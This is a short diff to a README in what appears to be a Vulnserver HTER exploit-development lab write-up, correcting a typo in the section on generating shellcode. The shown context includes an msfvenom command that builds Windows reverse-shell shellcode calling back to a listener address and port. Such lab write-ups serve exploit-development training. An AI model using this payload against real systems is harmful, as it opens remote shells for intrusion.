aqc1/Writeups/Vulnserver/HTER/README.md

 ## Generating shellcode

 First, let's use msfvenom to generate our shellcode.
-We need to make sure we use a hex format so the program correct interprets the shellcode.
+We need to make sure we use a hex format so the program correctly interprets the shellcode.

 ```bash
 msfvenom -p windows/shell_reverse_tcp LHOST=10.9.6.209 LPORT=9001 EXITFUNC=thread -b "\x00" -f hex